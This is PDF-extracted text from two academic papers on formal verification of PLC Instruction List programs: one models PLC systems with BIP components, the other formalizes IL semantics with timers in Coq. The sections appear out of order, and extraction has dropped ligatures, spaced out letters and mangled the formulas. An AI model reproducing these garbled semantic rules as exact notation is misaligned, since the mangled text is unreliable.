then get executed. Fig.3 presents the model of interrupt scheduler model. It answers the request signals from hardware and environment. An interrupt interrupt idelivers its name to the component that dispatches it. The scheduler component collects all the interrupts in a priority queue and chooses the high priority one to preempt main program by pre port. When the component moves to the Rea state, it broadcasts scheduling of the interrupt handler, which will be executed by corresponding components in the software model. In that process, the in- terrupt scheduler can accept new arrivals of interrupts and add them into the queue. When nishing that process, the component transmits to the PRE state through a port fin. If the queue is empty at that time, it moves back to the initial state and synchronizes with main program by retport. Otherwise, it will continue to handle interrupts. C. F ormalization of Function Call As IEC 61131-3 de nes, Program Organization Units (POU) is composed of program, function block (FB), and function, which are the minimum and independent software units in user programs. The PLC softwares organized by POU have good performance on modularity. FB may call functions or other function blocks in a nested way, but not recursive. Different from FB, however, function cannot do this owing tostartCyc finCycIDLEstartCyc finCycCalPara RetPara FBid S1 SnSUS pre retSiSi+1 Sj Sj+1call callcall return return returnpreret Fig. 4. BIP model of main program call returnIDLEcall returnCalPara RetPara FBidS1 SnSisubcal subretSi+1 Si+2subretsubcall Fig. 5. BIP model of Function Block no static variables and storage space. The general pattern of function call is presented in this paragraph. The main program calls functions shown in Fig.4 through a broadcast port call with parameters FBid which is the name of FB component to communicate with and the function arguments which will be valued. As shown in Fig.5, the called component runs after receiving call signal. When it comes to the RET instruction at the end, a stop signal will be send out through ret port to the program that makes the call. D. PLC System Architecture The execution of PLC software is highly related with the hardware platform and the environment. So we should model hardware platform and the environment. PLC system model includes three parts, the software model, hardware platform model and environment model. For the existing PLC software, the model can be obtained by automatic translation. Then the system model can do simulation or veri cation with the help of BIP tools. This framework is extendible. We can easily add more components. BIP separates behavioral and architectural aspects in mod- elling. Architecture is meaningfully de ned as the combination of interactions and priority. PLC system architecture shown in Fig.6 is composed of three layers. Software includes all application program organizations. The software are modelled as separate components. Main program can call functions or function blocks. Function block can call nested function block or nested function. CAL instruction is modelled as a CallCon connectors. The call port of calling program 514 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:07 UTC from IEEE Xplore. Restrictions apply. component sends signals by broadcast mechanism. It compares the names of all connected component with the name of called functions and decides which one is called. PLC can handle interrupts. The interrupt handler is modelled as a component. Timer is separate function, and is modeled as a component. When timer start, this component is aroused by call port. This layer describes the software structure explicitly. The middle layer is the abstraction model of the hardware platform. This layer simulates the features of PLC, that is cyclic execution mode and interruption handling. The bottom layer is environment. In order to make the system closed and available for veri cation, this layer in- cludes the model of controlled devices. Sensors collect data of environments. This information is written to PLC at the beginning of every execution cycle through startCyc port. After the computation of PLC programs, commands are given to actuators through finishiCyc port. Interrupt events of environment such as communication interrupt, alarm interrupt and clock interrupt are modelled as components. IV . T RANSLA TION BASED SOFTW ARE MODELING For the existing system, the model of main program and functional block in Fig.6 can be achieved by automatic trans- lation. The main program and functional block are translated to atomic components. We de ne the connectors for func- tion calls. Software models are composed by these atomic components and connectors. The system model obtained by this method has kept the topology structure of software. This section introduces the IL instructions of PLC, de nes the operational semantics of these instructions, and proposes the translation method and rules. A. IL Instructions In order to make this method more common, we choose IL language de ned in IEC 61131-3 as the source code. IEC 61131-3 de nes the modi er, function, function block. Compared with other PLC languages, IL is more concise and assembly like text language. IL language supports bool, integer, and oat. The cr(current result) register stores current computing result. Some instructions have crrelated condition- s. Our method models PLC POU as atomic component. The calling of interrupt handler is similar with function call. Bit Logic Instructions : AND, OR, XOR, NOT Set and Reset Instructions: S, R Data Load and Transfer Instructions: LD, ST Logic Control Instructions : JMP , CAL, RET Integer Math Instructions : ADD, SUB, MUL, DIV , MOD Comparison Instructions : GT, GE, EQ, NE, LE, LT IL instructions can have one or none operand. The operands of instructions can be variable, constant, label or address. Table I shows the meaning of common IL instructions. There are three kinds of variables, Iis the input variable, Qis the output variable, Mis the local variablesTABLE I THE MEANING OF ILINSTRUCTIONS Instruction Modi er Type Description AND N,( variable, constant logical and OR N,( variable, constant logical or XOR N,( variable, constant logical nor NOT NONE logical not S variable set R variable reset LD N variable, constant assign operand to cr ST N variable assign cr to operand JMP C,N Label jump to label instruction CAL C,N function name function call RET C,N NONE function return ADD ( variable, constant add operation SUB ( variable, constant subtraction operation MUL ( variable, constant multiply operation DIV ( variable, constant division operation MOD ( variable, constant mode operation GT ( variable, constant compare result is BOOL B. The Operational Semantics of IL Instructions The PLC programming organization unit Phas three type- s, program Prog , function Fun , and function block FB. Program con guration is the program execution environment including all data of the program. De nition 1 The con guration of programming organiza- tion unit PisCP=<ID,PC ,V,P IN,POUT >, ID is the name of current execution program, PC is the program counter, Vis the set of variables, including cr,cr V, PINis the variables of input port of program P.I fP has the type of Prog , this port is synchronous with the cyclic component with startCyc port. IfPisFB type, this port is synchronous with call port POUT is the variables of the output port of P.I fPhas the type of Prog this port is synchronous with the cyclic component with port finishCyc .I fPisFB type, this port is synchronous with retport IL program Pis a sequence of instructions l1,l2,...,l m, where m Nis the number of P. For any instruction li, the operational semantics S/llbracketli/rrbracketis a transition system. The program con guration is the state and the execution of an IL instruction causes a state transition from one con guration to another con guration. We de ne the BIP component model of program as follows: De nition 2 Transition system is is a triple = < CP,T,C0 P>, where CPis PLC program con guration, T CP CPis the set of transition relations, C0 P CPis the initial state. For the common denotation of all instructions, we add an IO instruction at the beginning with PC assigning 0. This instruction is used for synchronization with startCyc port and call port. It does not have data operation. The initial con guration is <I D ,0,Vinit,Pinit IN,Pinit OUT >. 1. The operational semantics of input instruction P(0) = IOis de ned as follows. If PisProg type, the data of port is transmitted. If the type is FB, the real parameter is passed 515 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:07 UTC from IEEE Xplore. Restrictions apply. Main programFunction BlockFunction Interrupt Scheduler Cyclic SchedulerInterrupt handler sensoractua torInterrupt 1Interrupt nEnvarionmentHardware PlatformSoftware Fig. 6. PLC System Architecture by ports. /mapsto denotes the change of variables. Imeans the data vector of port. startCyc( P)means combining data vector with input port of program P, if the type of PisProg . S/llbracketio/rrbracket= PC/prime=1,P/prime IN=PIN[ I/mapsto startCyc( P)] <I D ,0,V,P IN,POUT > <I D ,P C/prime,V,P/prime IN,POUT > IfP s type is FB S/llbracketio/rrbracket= PC/prime=1,P/prime IN=PIN[ I/mapsto call(P)] <I D ,0,V,P IN,POUT > <I D ,P C/prime,V,P/prime IN,POUT > 2. IfP(PC)=AND op, the operational semantics is S/llbracketAND /rrbracket= PC/prime=PC+1,V/prime=V[cr/mapsto cr op] <ID,PC ,V,P IN,POUT > <I D ,P C/prime,V/prime,PIN,POUT > This instruction only change the value of program counter and cr. Other logical instruction such as OR, XOR and NOT have the similar operational semantics. The type of opisBOOL. 3. IfP(PC)=So p , the operational semantics is S/llbracketS/rrbracket= PC/prime=PC+1,V/prime=V[if(cr=1 ) op/mapsto 1,e l s e o p /mapsto 0] <ID,PC ,V,P IN,POUT > <I D ,P C/prime,V/prime,PIN,POUT > The value of cris the execution condition. If cris1, the operand is set to 1, otherwise operand is set to 0.4. IfP(PC)=LD op , assign the value of opto register cr. S/llbracketLD /rrbracket= PC/prime=PC+1,V/prime=V[cr/mapsto op] <ID,PC ,V,P IN,POUT > <I D ,P C/prime,V/prime,PIN,POUT > 5. IfP(PC)=ADD op, this math instruction assigns the value of opwith cr, and saves to cr. The semantics of other math instructions are similar. S/llbracketADD /rrbracket= PC/prime=PC+1,V/prime=V[cr/mapsto cr+op] <ID,PC ,V,P IN,POUT > <I D ,P C/prime,V/prime,PIN,POUT > 6. IfP(PC)=GT op , compare instruction compares the operand with cr, theBOOL result is saved in register cr. S/llbracketGT /rrbracket= PC/prime=PC+1,V/prime=V[if(cr > op) cr/mapsto 1,e l s e c r /mapsto 0] <ID,PC ,V,P IN,POUT > <I D ,P C/prime,V/prime,PIN,POUT > 7. IfP(PC)=JMPC label andcris 1, then jump to instructions with the name of label , otherwise execute the next instruction. S/llbracketJMPC /rrbracket= if(cr=1 ) PC/prime=label, else PC/prime=PC+1 <ID,PC ,V,P IN,POUT > <I D ,P C/prime,V,P IN,POUT > 8. IfP(PC)=CAL op , here opis the name of called POU, operand is passed by the rst instruction IO. S/llbracketPC /rrbracket= ID/prime=op, PC/prime=0 <ID,PC ,V,P IN,POUT > <I D/prime,PC/prime,V,P IN,POUT > 9. IfP(PC)= RET , return instruction gives the result to calling program through connectors and ports. pre(PC)is 516 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:07 UTC from IEEE Xplore. Restrictions apply. ) ( exeistm iendi begin Fig. 7. Basic instruction translation rule ) ( exeistm ) ( exe1/g14istmbegin end end i begin1/g14iendiend Fig. 8. Sequence instruction translation rule the value of calling program. pre(ID)is the name of calling program. S/llbracketRET /rrbracket= PC/prime=pre(PC)+1 ,I D/prime=pre(ID),f <ID,PC ,V,P IN,POUT > <I D/prime,PC/prime,V,P IN,P/prime OUT >, where f=P/prime OUT=POUT[ O/mapsto finCyc(P)] C. Automatic Translation Rules The instruction semantics explains the execution effect for the con guration. We can extract the translation rule in line with instruction semantics. Assuming that program Pis composed of ninstructions P={IO,l 1, ..., l n}The initial state of the translation system is<I D ,0,Vinit,Pinit IN,Pinit OUT >. The transition for instruc- tionliisCi pexe(li) Ci+1 P. PLC program control instruction will change the structure of the transition system. We conclude these instructions into four kinds as shown below, stm stand for one instruction and code is a segment of instructions. 1) Basic instructions Code=stm i The state machine for this kind of instruction is showed in g.7 2) Sequence instructions Code=stm i stm i+1 Sequence instructions are two instructions executed one by one. Fig. 8 combines the nishing state of stm iwith the beginning state of stm i+1. 3) Branch instruction Code=JMP(C)label code 1 label code 2 Jump instruction is used for branching control. JMP instruction is for uncondition jump. The program will directly jump to code 2. When the value of cris 1, JMPC instruction will jump, otherwise it execute the next instruction. Fig 9 models jump instructions. 4) Function call instruction Code=CAL FBname code 1begin begin begin) ( exe JMP 1/g32/g32cr1code begin begin 2 code begin 0/g32/g32cr 1code begin begin 2 code begin Fig. 9. Branch instruction translation rule callwait beginret wait begin code begin Fig. 10. Function call instruction translation rule In BIP model, CAL instruction is synchronous with called component through call port. When the called function nished execution, it returns to main program with values through retport. While translating according to the rules strictly, the state space is large. The transition for sequence instruction only change the value of local variable and do not communicate with other component through ports. For example, transitions Ci pr(li) Ci+1 pr(li+1) Ci+2 pr(li+2) Ci+3 p are all inter- nal transitions. BIP is a high level modelling language and expressiveness. Transitions in BIP component always have communication signals. So when program segments only have sequence instructions, we can compress these steps into one step, that is Ci pr(li);r(li+1);r(li+2) Ci+3 p. One transition has three assign operations. Here is an example demonstrating the translation based modelling method. Fig.11 is the IL program for computing the square root. Fig.12 is the corresponding formal models. This component has two ports, calling port call and returning portcall. Port call binds the input data xand port ret binds the square root of x. The segments without jump instruction and call instruction can be compressed in to one transition. This method reduces the scale of model. V. C ONCLUSION Computer aided veri cation is an important task in complex embedded system. The formal modelling of PLC system for veri cation is a rough task. Good veri cation model should be faithful and concise. At one hand the model must be consistent with the system, at the other hand the model must have suitable scale because of the state explosion problem of veri cation. This paper has proposed a systemic method for the construction of veri cation model. PLC system architecture and PLC features has been modeled as components and 517 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:07 UTC from IEEE Xplore. Restrictions apply. VAR_INPUT x: INT; END_VAR VAR_OUTPUT result:INT; END_VAR VAR v:INT; vsqr:INT; END_VAR LD 0 ST v start: LD v ADD 1 ST v MUL v ST vsrq LD x GT vsqr JMPC start LD x EQ vsqr JMPC equal LD v SUB 1 ST result JMP equal: LD v ST result end: RET Fig. 11. IL program call v:=0 vsqr:=v*(v+1) cr==1cr==0 result=v-1 result=v retcr:=(x==vsqr?)cr:=(x>vsqr?) cr==1cr==0 call(x) ret(result)Data int x Data int result Data int v Data int vsqr Fig. 12. program modelconnectors. This is universal for all PLC applications. We have given an automatic translation method for software modelling based on operational semantics. A small example has been demonstrated for our approach. ACKNOWLEDGEMENT This work is supported by the International S&T Coop- eration Program of China (2011DFG13000), Mechanism and V eri cation of High-speed Embedded Communication Sys- tems in Rugged Environment(2010DFB10930) and the Beijing Natural Science Foundation and S&R Key Program of BMEC (4122017, KZ201210028036). REFERENCES [1] E. M. Clarke, O. Grumberg, Model Checking, The MIT Press, 1999. [2] International Electrotechnical Commisson, Techincal Committee No, 65, Programmable Controller-Programming Languages, IEC61131-3, second edition(1998), comminttee draft. [3] G. Canet and s. Couf n, Towards the automatic veri cation of PLC programs written in Instruction List, 2000. [4] R. Huuck, Semantics and Analysis of Instruction List Programs, In Electronlc Notes in Theoretical Computer. Sclence 115(2005)3-18 [5] K. Loeis, M. B. Younis, G. Frey, Application of Symbolic and Bounded Model Checking to the V eri cation of Logic Control Systems, Proceedings of the 10th IEEE International Conference on Emerging Technologies and Factory Automation, ETFA 2005, Catania, Italy, V ol.1, pp.247-250, Sept.2005. [6] M. B. Younis, G. Frey, Formalization of PLC Programs to Sustain Relia- bility, Proceeding of the 2004 IEEE Conference on Robotics, Automation and Mechatronics, RAM-2004, Singapore, pp. -618, Dec. 2004. [7] M. B. Younis, G. Frey, Visualization of PLC Programs Using XML, Proceedings of the American Control Conference (ACC2004), Boston, USA, pp. 3082-3087, June 2004. [8] H. X. Willems, Compact Timed Automata for PLC Program. Technical Reprot, University of Nijmegen, 1999. [9] http://www.uppaal.com, accessed January 2007. [10] M. Heiner and T. Menzel, A Petri Net Semantics for the PLC Language Instruction List IEE Control, 1998, pp. 161-166. [11] T. Mertke and G. Frey, Formal V eri cation of PLC-Programs Generated from Signal Interpreted Petri Nets. In Proceedings of the International Workshop on Discrete Event Systems, In Proc. Int. Conf. Systems, Man and Cybernetics, 2001, pp. 2700-2705 [12] X. Weng and L. Litz, V eri cation of Logic Control Design Using SIPN and Model Checking-Methods and Case Study. In proceedings of the American Control Conference, 2000, PP . 4072-4076 [13] A. Basu, M. Bozga, J. Sifakis, Modeling Heterogeneous Real-Time Components in BIP , In SEFM 06 Conference, IEEE Computer Society (2006). [14] A. Basu, S. Bensalem, M. Bozga, J. Combaz, M. Jaber, T.-H. Nguyen, and J. Sifakis, Rigorous component-based system design using the bip framework, IEEE Software , vol. 28, no. 3, pp. 41 48, 2011. [15] The BIP Toolset, http://www-verimag.imag.fr/Rigorous-Design-of- Component-Based.html. [16] Marius Bozga, Mohamad Jaber, Joseph Sifakis, Source-to-Source Ar- chitecture Transformation for Performance Optimization in BIP , IEEE Trans. Industrial Informatics 6(4): 708-718 (2010) [17] Borzoo Bonakdarpour, Marius Bozga, Mohamad Jaber, Jean Quilbeuf, Joseph Sifakis, From high-level component-based models to distributed implementations , EMSOFT 2010: 209-218. [18] Saddek Bensalem, Marius Bozga, Thanh-Hung Nguyen, Joseph Sifakis, D-Finder: A Tool for Compositional Deadlock Detection and V eri cation , CA V 2009: 614-619 518 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:07 UTC from IEEE Xplore. Restrictions apply.
Formal Modelling of PLC Systems By BIP Components Rui Wang, Yong Guan, Liming Luo College of Information Engineering, Capital Normal University, Beijing, ChinaJie Zhang College of Information Science and Technology, Beijing University of Chemical Technology, Beijing, China Xiaoyu Song ECE Dept, Portland State University Portland, USA
A_Formal_Semantics_of_PLC_Programs_in_Coq.pdf
Programmable logic Controllers (PLC) are embedded systems that are widely used in industry. We propose a formal semantics of the Instruction List (IL) language, one of the ve programing languages de ned in the IEC 61131-3 standard for PLC programing. This semantics support a signi cant subset of the IL language that includes on-delay timers .W e formalized this semantics in the proof assistant Coq and used it to prove some safety properties on an example of PLC program. ion interpretation techniques are also used for the veri cation of PLC programs. In [5] an op- erational semantics of IL is de ned. This semantics is used to perform abstract interpretation of IL programs by a prototype tool called HOMER. In the theorem proving community, there has been some work on the formal analysis of PLC pro- grams. In [4] the theorem prover HOL is used to verify PLC programs written in FBD, SFC and ST languages. In this work, modular veri cation is used for compositional correctness and safety proofs of programs. In the Coq system, an exam-ple of veri cation of PLC program with timers is presented in [11]. A quiz machine program is used as an example in this work, but no generic model of PLC programs is formalized. There is also a formalization of a semantics3of the LD languages inCoq. This semantics support a sub-set of LD that contains branching instructions. This work is a component of a CDK environment for PLC. VI. Conclusions and future work Ourgoalistodevelopaformallyveri edcompiler and a veri cation tool for PLC programs. This require a formal semantics of PLC programing languages. In this paper we presented a formal semantics of PLC programs written in the IL lan- guage. This semantics covers a large sub-set of IL instructions that includes timers. We formalized this semantics in the type theory based theorem prover Coq and used it to prove some safety prop- erties of a simple example of PLC program. The proof of these properties are straightforward and require only some basic knowledge about the Coq system. Although our main goal is the development of a PLC certi ed compiler, this work can also be usedforformallyprovingpropertiesofILprograms. In the short term, the perspectives of our work are the following: Developing a certi ed compiler front-end for PLC. We plan to formalize and certify a trans- formation of PLC programs written in LD language to IL. Integrating our formal semantics of IL with the formal semantics of the meta language SFC [12]. This work will allow us to prove safety properties of industrial examples of PLC programs written in SFC. In the long term, the work on the certi ed compiler front-end open the way to the development of a certi ed compilation chain for PLC. This chain can be build on top of the CompCert compiler and uses the BIP [13] framework as an intermediate language. We also plan to develop a static analysis tool for PLC programs. 3Research report in Korean available at: http://pllab.kut. ac.kr/tr/2009/ldsemantics.pdf 134 135 126 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. References [1] I. E. Commission, IEC 61131-3 : Programmable controllers - programming languages, IEC, Tech. Rep., 2003. [2] A. Mader and H. Wupper, Timed automaton mod- els for simple programmable logic controllers, Real- Time Systems, Euromicro Conference on , pp. 01 06, 1999. [ 3 ]G .C a n e t ,S .C o u n ,J . - J .L e s a g e ,A .P e t i t ,a n d P.Schnoebelen, Towardstheautomaticveri cation of plc programs written in instruction list, in 2000 IEEE International Conference on Systems, Man, and Cybernetics , vol. 4, 2000, pp. 2449 2454. [4] N. V olker and B. J. Kr amer, Automated veri ca- tion of function block-based industrial control sys- tems, Science of Computer Programming , vol. 42, no. 1, pp. 101 113, 2002. [5] R. Huuck, Semantics and analysis of instruction list programs, Electr. Notes Theor. Comput. Sci. , vol. 115, pp. 3 18, 2005. [6] TheCoqDevelopmentTeam, TheCoqSystem ,http: //coq.inria.fr. [7] G. Gonthier and A. Mahboubi, As m a lls c a l er e e c - tion extension for the Coq system , iNRIA Technical report, http://hal.inria.fr/inria-00258384. [8] X. Leroy, A formally veri ed compiler back-end, Journal of Automated Reasoning , vol. 43, no. 4, pp. 363 446, 2009. [9] G. Gonthier and A. Mahboubi, An introduction to small scale re ection in Coq, iNRIA Technical report, http://hal.inria.fr/inria-00515548/PDF/ RR-7392.pdf. [10] W. Bolton, Programmable Logic Controllers .E l s e - vier, 2006. [11] H. Wan, G. Chen, X. Song, and M. Gu, Formal- ization and veri cation of PLC Timers in Coq, inComputer Software and Applications Conference, 2009. COMPSAC 09. 33rd Annual IEEE Interna- tional, 2009, pp. 315 323. [12] J. O. Blech, A. Hattendorf, and J. Huang, To- wards a property preserving transformation from IEC 61131-3 to BIP, CoRR, vol. abs/1009.0817, 2010.[13] S. Bensalem, M. Bozga, T.-H. Nguyen, and J. Sifakis, Compositional veri cation for component-based systems and application, IET Software,SpecialIssueonAutomatedCompositional Veri cation: Techniques, Applications and Empirical Studies , vol. 4, no. 3, pp. 181 193, 2010. 135 136 127 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply.
A formal semantics of PLC programs in Coq Sidi OULD BIHA FORMES project, INRIA and Tsinghua University Beijing, China Sidi.Ould [email protected] I. Introduction Programmable Logical Controllers (PLC) are micro-processor based control systems. They are used in a wide range of industrial applications, from automotive industry and chemical plants to home appliances. PLC applications are critical in a safety or economical cost sense. The recent events of the recall of a large amount of cars for some safety problems caused by a programming bug, are just a new example of a how the cost of such errors can easily get out of proportion. This is more relevant for PLC programs because they are generally used to perform repetitive actions. Thus the use of formal methods and specially theorem proving in the PLC programs development process, will increase the con dence in such programs. Instruction list (IL) is one of the ve programing languages de ned in the IEC 61131-3 standard [1]. With the graphical language ladder diagrams (LD), they are the most widely used languages for pro- graming PLC. The de nition of a formal semantics of IL is a prerequisite for the development of a generic tool for verifying PLC programs written in IL. Since most of PLC compilers use IL as an This research work is funded by the ANR grant ANR-08- BLAN-0326-01 for the SIVES project.intermediate language in the compilation process to machine code, a formal semantics of IL is also nec- essary for the development of a certi ed compiler f o rP L C .T h i sw o r ki st h e r s ts t e pt o w a r d st h e development of a certi ed compiler for PLC pro- grams. It also provides a basis for the development of a static analyzer for PLC programs. There are many examples of the use of formal methods for the veri cation of PLC programs [2], [3], [4]. Most of these examples use model checking. In some of these works, an operational seman- tics of PLC programs is de ned. We extend the operational semantics de ned in [5] to support a larger subset of IL instructions (timers...) and the cyclic behavior of PLC programs. We formalized t h i ss e m a n t i c si nt h ep r o o fa s s i s t a n t Coq [6] using its extension SSRe ect [7]. In this paper, we give in the rst section a brief presentation of PLC systems. In the second section we present a small step operational semantics of the IL language. The formalization of this semantics in the proof assistant Coq and an example are d e s c r i b e di nt h et h i r ds e c t i o n .R e l a t e dw o r k sa n d conclusions are presented in the two nal sections. II. Programmable Logic Controller A PLC is composed of a microprocessor, a mem- ory, input and output devices where signals can be received from sensors or switches and sent to actuators. A main characteristic of PLC is there execution mode. A PLC program is executed in a permanent loop. In each iteration of the execution loop, or scan cycle , the inputs are read, the pro- gram instructions are executed and the outputs are updated. Figure 1 shows the sequencing of the 3 phases of the scan cycle . The cycle time is often xed or has an upper bound limit. It depends on the manufacturer and type of the PLC. 2011 35th IEEE Annual Computer Software and Applications Conference 0730-3157/11 $26.00 2011 IEEE DOI 10.1109/COMPSAC.2011.23126 2011 35th IEEE Annual Computer Software and Applications Conference 0730-3157/11 $26.00 2011 IEEE DOI 10.1109/COMPSAC.2011.23127 2011 35th IEEE Annual Computer Software and Applications Conference 0730-3157/11 $26.00 2011 IEEE DOI 10.1109/COMPSAC.2011.23118 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. Inputs scan instructions execution Outputs scan Figure 1. Schema of PLC scan cycle A. Programing languages Since the introduction of PLC in the industry, each manufacturer has developed its own PLC programming languages. In 1993, the International Electrotechnical Committee (IEC) published the IEC 1131 International Standard for PLC. The third volume of this standard de nes the program- ming languages for PLC. It de nes 4 languages : Ladder Diagrams (LD) : graphical language that represent PLC programs as relay logic diagrams. Functional Block Diagrams (FBD) : graphical language that represent PLC programs as con- nection of di erent function blocks. Instruction List (IL) : an assembly like lan- guage. Structured Text (ST) : a textual (PASCAL like) programing language. The standard de nes also a meta language called Sequential Function Charts (SFC). It corresponds to a graphical method for structuring programs and allows to describe the system as a state transition diagram. Each state is associated to some actions. An action is described using one of the PLC pro- graming languages like LD or IL. SFC are well suited to write concurrent control programs. We present later in more details the IL language, the main focus of this work. B. Timers In the context of PLC applications, there is often the need to control time. For example, a motor might need to be activated or switched o for a particular time interval. Another example, in a chemicalplantavalveisopenandatankwillbefullafter a period of time. PLC timers are components that set on a boolean output after or for a period of time following the activation of a boolean input. They are used to control output signal duration or as input signal for time dependents PLC programs. In general, they have two inputs and two outputs. Txx TIME PTBOOL IN ETTIMEQBOOL Figure 2. Standard timer representation Figure 2 shows the IEC 61131-3 standard graphical representation of timers. In this representation, IN andQarerespectivelythebooleaninputandoutput of the timer. PTis the constant input used to specify the time delay of the timer. ETis the output indicating the elapsed time since the activation of the timer. The delay PTand elapsed time ETare multiples of a system prede ned time base. IN Q (a)on-delay timerIN Q (b)o -delay timer IN Q (c)pulse timer Figure 3. Types of timers T h e r ei st h r e eb a s i ct y p e so ft i m e r st h a tc a nb e found with PLC. The IEC 61131-3 standard de nes the : on-delay timers (TON) : they come on after a time delay following the activation of the input (Figure 3(a)). o -delay timers (TOF) : they stay on for a xed period of time after the input goes o (Figure 3(b)). pulse timers (TP) : they turn on for a xed period of time after the input goes on (Fig- ure 3(c)). 127 128 119 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. III.Instruction List language A. General structure The IEC 61131-3 standard de nes an Instruction Listprogram as a list of variables (input, output and local) declarations followed by a list of instruc- tions. An instruction contains an operator followed by a list of operands . Most of IL instructions take one operand, but some like timers instructions need more than one operand. A labelfollowed by a c o l o n( : )c a nb ei n s e r t e db e f o r ea ni n s t r u c t i o n .A n example of IL program is the following: LABEL OPERATOR OPERAND l1: LD x ADD 3 JMP l1 The meaning of some IL operators can be changed using modi ers. In particular, the standard de nes the two modi ers: Cand N.T h e Cmodi er indi- cates that the corresponding instruction should be executed only if the current evaluated result is the boolean value true. It can be used with branch- ing instruction or functions call. The Nmodi er indicates that the operand of the corresponding instructionshouldbenegated.Ifitiscom binedwith theCmodi er, it means that the corresponding i n s t r u c t i o ns h o u l db ee x e c u t e do n l yi ft h ec u r r e n t evaluated result is the boolean value false.I tc a n be used with branching instruction, functions call or booleans operators. For example, the instruction JMPCN l1 will be executed only if the current eval- uation is false. B. Model choices The IEC 61131-3 standard was published after many PLC manufacturers have de ned and imple- mented their own programming languages. It does not give a clear description of the semantics of PLC languages. It does not also specify how PLC timers shouldbehave.WesawpreviouslythataPLCtimer have two outputs : the boolean output and the elapsed time since the timer activation output. How this output are updated is not described by the standard. In practice, PLC manufacturers de nes t w ot y p e so ft i m e r sa c c o r d i n gt ot h ew a yt h e i r outputs are updated. In the rst category, outputs can be updated only if the timer instruction isexecuted. For this kind of timers, a time error is introduced depending on the timer delay variable and the program cycle duration. In the second category, timer outputs are automatically updated by a system routine. In this case a time error is introduced depending on the position of the timer instruction in the program. The execution of the timer instruction is only required to check the state of the outputs. Both timers are not ideal timers and the time error should be taken into account by the PLC programmer when de ning the timers delay input. Our IL model is a signi cant subset of the lan- guage de ned by the IEC 61131-3 standard. This subset covers assignments instructions and boolean and integer operations. It covers also comparison andbranchinginstructionsand on-delaytimers .W e choose to consider only booleans and integers as basic data types. In most of PLC systems, reals are available as basic data types. But in practice, real numbers computation cost much time and they are often delegated to a PC that can communicate with the PLC. This is motivated by the need to keep the program scan cycle within a relatively small time upper bound. In this work we will consider only TON timers. The other two kinds of timers can be treated similarly. We will also suppose that the outputs of the timers are updated only when the timer instruction is executed. This is the case in most of the timers provided by PLC manufacturers. We will also suppose that in an IL program, a timer instruction is called only once with the same output variable. This is needed to keep the time error for the timer less than an cycle duration. T h eI Ls u b s e tw ew o r kw i t hd o e sn o ti n c l u d e function call or counters instructions. In our model, we also choose to work with simple IL operators. In particular, the IL language support binary opera- tors that use a stack for the operation execution. T h eI Ls u b s e tw ed e a lw i t hd o e sn o ti n c l u d e st h i s operators.Anextensionofoursemanticstosupport these operators and the function call should not be di cult. C. Syntax EachILprogramstartwithvariabledeclarations. We will denote the type of IL variables by Var. These declarations specify for each variable if it is 128 129 120 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. an input ( Varin) or/and output ( Varout)o ral o c a l variable ( Varloc). In addition to standard variables, IL have a speci c register where every computation takes place. This special register will be denoted reg. P::={varin;list input variables varout;list output variables varloc;list local variables body;}list of instructions After the variable declarations, the IL program body follows with a list of instructions. As we mentioned before, an IL instruction is composed of an operator and one or more operands. An operand can be a variable or a constant. Instructions: i::= LDop load |STid store |SRid|RSid set and reset |JMPlbl|JMPClbljumps |JMPCN lbl |ADDop|SUBop integers |MULop |ANDop|ORop booleans |ANDN op|ORNop |NOTop |EQop|GEop comparison |GTop |TONid , n On delay timer |RET end of program Operands: op::=id|cstvariable identi er or constant Constants: cst::=n|binteger or boolean literal We will denote the set of IL instructions by Instr. For simplicity, we suppose that IL program labels are natural numbers. Since an IL program is a list of instruction, a label will indicate the position of thecorrespondinginstructioninthelist.Foragiven program Pand an index i,P(i) Instrrepresent the instruction of Pat the position i. D. Operational semantics We de ned a small step operational semantics of IL programs. This semantics extend the one de ned in [5] to support on-delay timers and the cyclic behavior of PLC programs.Modes:as we mentioned in Section II, each IL program scan cycle contains 3 phases: I: input, O: output, E: instruction execution. The set of these execution phases will be denoted modes. Cycles: we suppose having a global discrete time clock. Each program execution cycle is rep- resented by an identi er or its index in the time execution line. Every cycle is associated to its beginning time according to the global clock. The set of program execution cycles is denoted C N. For a cycle c, the starting time is denoted tcand t h ed u r a t i o no fe v e r yc y c l ei s x e da n dc o r r e s p o n d to a global system constant =tc+1 tc. States:a state is a function that associates to each variable of the program and the register a value. The set of state corresponds to: S={reg} Var D, whereDis the union of the IL variables data domains. Con gurations: elements of the set E=C S N mode. A con guration (c, ,i,m)corresponds to a cycle identi er c, a state , a position index i and an execution mode m. Transitions: relationoncon gurations E E. F i g u r e4g i v e st h ei n f e r e n c er u l e so ft h eI Lc o n g u - rations transitions relation. The transition system is de ned by an initial con guration (0, 0,0,I), where 0istheinitialstatethatmapsallthein teger variables to 0and boolean variables to false. The rst two transitions rules of Figure 4 cor- respond to the loadandstoreinstructions. In the rst case the register is updated while in the second the variable state is updated. The transitions cor- responding to the set/reset instructions (rules SR andRS) update the variable state function with the corresponding values for the given operands. In the inference rule JMP, transition for the uncondi- tional branching instruction, there is no condition on the branching label value (position of the jump- ing target) compared to the current position of the program counter. This can lead to non terminating ILprograms.Inpracticethisshouldnotbethecase, since every IL program should terminate during the 129 130 121 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. LDP(i)=LD op /prime= [reg/mapsto op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)P(i)=STx /prime= [x/mapsto reg] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)ST SRP(i)=SR x /prime= [x/mapsto x reg] P/turnstileleft(c, ,i,E ) (c, 